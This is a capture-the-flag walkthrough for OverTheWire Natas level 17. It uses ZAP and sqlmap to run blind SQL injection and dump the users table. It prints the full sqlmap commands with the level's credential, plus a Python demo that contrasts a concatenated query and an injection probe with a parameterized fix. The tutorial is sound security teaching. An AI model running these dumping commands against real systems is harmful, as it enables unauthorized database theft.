Natas 17 — Blind SQL Injection with SQLMap
Welcome back to the Natas series. Let’s take a look at Natas 17. Before jumping in, open OWASP ZAP and launch the browser configured to proxy through it; that way you’ll get that fantastic HUD.
Let’s use that HUD. First, set your scope to ‘natas17’ using the top left button (Out):
This way we’re preparing ZAP to capture the requests and responses that matter to us. Now, back to our level: it seems like we’re back at Natas 15. We’ll deal with it like we did before, putting some input in the box and reading the output. Trying ‘natas17’… nothing. Trying ‘natas18’… nothing. We could take a look at the source code to determine what is going on behind the curtains, but not now.
What do we know so far? We have a form with a text input that doesn’t give any output. Could it be vulnerable? Let’s take a look at the requests and see how we can use them with SQLMap:
Open a terminal window and write the SQLMap command with parameters:
$ sqlmap -u "http://natas17.natas.labs.overthewire.org/index.php" --proxy=http://127.0.0.1:8080 --data=username=natas17 --auth-type=basic --auth-cred=natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
Let’s break things down:
- -u "http://natas17.natas.labs.overthewire.org/index.php": the Natas 17 URL
- --proxy=http://127.0.0.1:8080: we’re using ZAP as an HTTP proxy, so we can inspect the requests
- --data=username=natas17: username is the POST parameter we’re testing
- --auth-type=basic: authentication type
- --auth-cred=natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw: username/password of our current level
Press ‘enter’ and wait…
Ok, we’ll try --level=5 and --risk=3:
$ sqlmap -u "http://natas17.natas.labs.overthewire.org/index.php" --proxy=http://127.0.0.1:8080 --data=username=natas18 --auth-type=basic --auth-cred=natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw --level=5 --risk=3
This will take some time.
We could add one more parameter, ‘--dbms=mysql’, since we know it’s the DBMS in use.
Finally. Let’s list the databases by adding the ‘--dbs’ parameter:
Now we determine the tables with -D natas17 --tables:
And the columns with -D natas17 -T users --columns:
Exploration time is over. It’s time to get our prize:
$ sqlmap -u "http://natas17.natas.labs.overthewire.org/index.php" --proxy=http://127.0.0.1:8080 --data=username=natas18 --auth-type=basic --auth-cred=natas17:8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw --level=5 --risk=3 --dbms=mysql -D natas17 -T users --dump
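Why a form that prints nothing can still be dumped: as an added example (not the Natas source, which this post never looks at), here is the concatenated-query pattern sqlmap exploits beside its parameterized fix, using an in-memory SQLite stand-in for the natas17 MySQL database. The table and column names, the single-quote style and the row contents are assumptions.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the natas17 database the post enumerates
    (table users); column names and rows are assumptions, not real secrets."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("natas17", "placeholder-17"), ("natas18", "placeholder-18")],
    )
    return db


def user_exists_vulnerable(db, username):
    """Builds the SQL by string concatenation, so the input becomes part of the
    query text. Like the Natas form, nothing is echoed back; only whether the
    query matched (here, a bool; in Natas 17 only timing) leaks out. That
    one-bit channel is all blind inference needs, which is why sqlmap at
    --level=5 --risk=3 still gets the table out."""
    query = "SELECT * FROM users WHERE username='%s'" % username
    return db.execute(query).fetchone() is not None


def user_exists_fixed(db, username):
    """Parameterized query: the value travels separately from the SQL text,
    so quotes, AND/OR and comment markers in the input are matched literally
    and never change the statement's logic."""
    query = "SELECT * FROM users WHERE username=?"
    return db.execute(query, (username,)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    # Constructed probe: a closing quote followed by an always-true condition.
    probe = "natas18' AND 1=1 -- "
    print("concatenated:", user_exists_vulnerable(db, "natas18"),
          user_exists_vulnerable(db, probe))   # True True  (query logic altered)
    print("parameterized:", user_exists_fixed(db, "natas18"),
          user_exists_fixed(db, probe))        # True False (probe is just a username)
```

The concatenated version reports a match for the probe because the injected condition was evaluated as SQL; the parameterized version looks for a user literally named with that string and finds none.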
Finally, we got the flag. Natas 18 is up next.